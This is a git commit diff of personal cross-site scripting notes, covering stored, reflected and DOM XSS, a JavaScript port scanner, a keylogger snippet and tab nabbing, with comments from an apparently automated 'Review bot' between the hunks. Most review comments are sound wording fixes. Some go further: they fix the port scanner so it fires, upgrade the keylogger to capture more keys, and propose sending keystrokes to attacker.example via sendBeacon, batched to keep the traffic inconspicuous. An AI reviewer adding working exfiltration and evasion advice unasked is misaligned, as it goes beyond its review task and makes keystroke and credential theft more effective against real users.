cleanup and some infos

This commit is contained in:
gurkenhabicht 2026-05-24 22:34:33 +02:00
parent 9fe3c7f7cc
commit d61022f4b3
1 changed files with 10 additions and 8 deletions


@ -5,14 +5,16 @@ is possible in Javascript, VBScript, Flash and CSS.
## Stored XSS ## Stored XSS
This is where a malicious string originates from the websites database. Such as The stored XSS persists in the backend of the site after a successful hack.
This is where a malicious string originates from the website's database. Such as
(stored in a db) (stored in a db)
* User profiles * User profiles
* Chats and comments * Chats and comments
* Part of link * Part of link
* Blind xss is stored inside the app but effects are only visible by proxy, [xsshunter](https://xsshunter.com/). Blind xss is stored inside the app, but effects are only visible by proxy,
[xsshunter](https://xsshunter.com/).
### Examples ### Examples
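Review bot: the added sentence "The stored XSS persists in the backend of the site after a successful hack" is vague about what persists and where; the payload sits in a server-side data store (database row, log, uploaded file) and is served back to every user whose page renders that data, so "after a successful injection" with the store named would be more precise than "after a successful hack". The blind XSS bullet could likewise say why the effects are only visible by proxy: the payload fires in a context the attacker never sees (an admin panel, a support-ticket backend), so confirming execution depends on an out-of-band callback to a listener such as xsshunter.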
@ -40,7 +42,7 @@ Open nc port and collect cookies
## Reflected XSS ## Reflected XSS
In a reflected cross-site scripting attack, the malicious payload is part of In a reflected cross-site scripting attack, the malicious payload is part of
the victims request to the website. The website includes this payload in the victim's request to the website. The website includes this payload in
response back to the user. To summarise, an attacker needs to trick a victim response back to the user. To summarise, an attacker needs to trick a victim
into clicking a URL to execute their malicious payload. into clicking a URL to execute their malicious payload.
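Review bot: the possessive fix ("victim's request") is right, but the summary "an attacker needs to trick a victim into clicking a URL" overstates the single delivery vector; a reflected payload can also arrive in a POST body via an auto-submitting form on an attacker-controlled page, so "into sending a crafted request, typically by clicking a URL" is more accurate. It would also help to state the contrast with the section above: nothing is persisted on the server, which is why each victim has to be targeted individually.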
@ -72,8 +74,8 @@ Open netcat binder to catch the http queries
## DOM based XSS ## DOM based XSS
With [DOM-Based With [DOM-Based
XSS](https://portswigger.net/web-security/cross-site-scripting/dom-based), an XSS](https://portswigger.net/web-security/cross-site-scripting/dom-based),
attackers payload will only be executed through the DOM when the an attacker's payload will only be executed through the DOM when the
vulnerable Javascript code is either loaded or interacted with. It goes through vulnerable Javascript code is either loaded or interacted with. It goes through
a Javascript function like so: a Javascript function like so:
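Review bot: beyond the possessive fix, the sentence still misses the defining property of DOM-based XSS: the payload may never reach the server at all (for example when it lives in location.hash), and it executes because client-side script copies a source such as location.search, location.hash or document.referrer into a sink such as innerHTML, document.write or eval. Naming the source/sink pair here would tie the paragraph to the example function that follows. "Javascript" should also be "JavaScript" in both lines.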
@ -164,7 +166,7 @@ By requesting the favicon, checking port 80
let code = '<img src="http://' + ip + '/favicon.ico" onload="this.onerror=null; this.src=/log/' + ip + '">' let code = '<img src="http://' + ip + '/favicon.ico" onload="this.onerror=null; this.src=/log/' + ip + '">'
document.body.innerHTML += code document.body.innerHTML += code
} }
</script> </script>
``` ```
[pdp's portscanner](https://www.gnucitizen.org/files/2006/08/jsportscanner.js) [pdp's portscanner](https://www.gnucitizen.org/files/2006/08/jsportscanner.js)
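Review bot: the context line that builds `code` has a broken onload handler: `this.src=/log/' + ip + '` emits `this.src=/log/<ip>` with no quotes around the path, which the browser parses as a regular-expression literal with invalid flags and rejects, so the success callback never fires. Quote the path, e.g. `onload="this.onerror=null; this.src=\'/log/' + ip + '\'"`. Clearing `onerror` inside `onload` also does nothing useful on its own; presumably an `onerror` handler is meant to be set before the load so that a failed favicon fetch is not logged as a hit. The hunk itself is whitespace-only, so this may be a follow-up, but the snippet does not work as written.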
@ -173,7 +175,7 @@ By requesting the favicon, checking port 80
```javascript ```javascript
<script type="text/javascript"> <script type="text/javascript">
let l = ""; // Variable to store key-strokes in let l = ""; // Variable to store keystrokes in
document.onkeypress = function (e) { // Event to listen for key presses document.onkeypress = function (e) { // Event to listen for key presses
l += e.key; // If user types, log it to the l variable l += e.key; // If user types, log it to the l variable
console.log(l); // update this line to post to your own server console.log(l); // update this line to post to your own server
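Review bot: the only change here is "key-strokes" to "keystrokes", which is fine, but the snippet registers `document.onkeypress`, which is deprecated and does not fire for non-printing keys such as Backspace, Tab or Enter; `document.onkeydown` with the same `e.key` read captures those too. The comment "update this line to post to your own server" could show the concrete call, e.g. `navigator.sendBeacon('https://attacker.example/log', l)` (hypothetical host) or a `fetch` with `mode: 'no-cors'`, and flushing the buffer on an interval rather than on every key press keeps the traffic far less conspicuous.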
@ -193,7 +195,7 @@ document.onkeypress = function (e) {
## Tab Nabbing ## Tab Nabbing
* Redirection of source after opening a tab through a provisioned link and back referencing * Redirection of source after opening a tab through a provisioned link and back referencing
* [Hacktricks Tabnabbing](https://book.hacktricks.xyz/pentesting-web/reverse-tab-nabbing) * [Hacktricks Tabnabbing](https://book.hacktricks.xyz/pentesting-web/reverse-tab-nabbing)
## Tricks and Tips ## Tricks and Tips
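Review bot: the tab-nabbing bullet is hard to follow ("Redirection of source after opening a tab through a provisioned link and back referencing"). The mechanism the Hacktricks link describes is reverse tabnabbing: a page opened via `target="_blank"` or `window.open` without `rel="noopener"` receives a `window.opener` reference and can set `window.opener.location` to a phishing copy of the original site while the victim is looking at the new tab. Rewording the bullet to say that, and noting the `rel="noopener noreferrer"` mitigation (current browsers default to noopener for `target="_blank"`, but `window.open` from script still needs the feature string), would make the section usable.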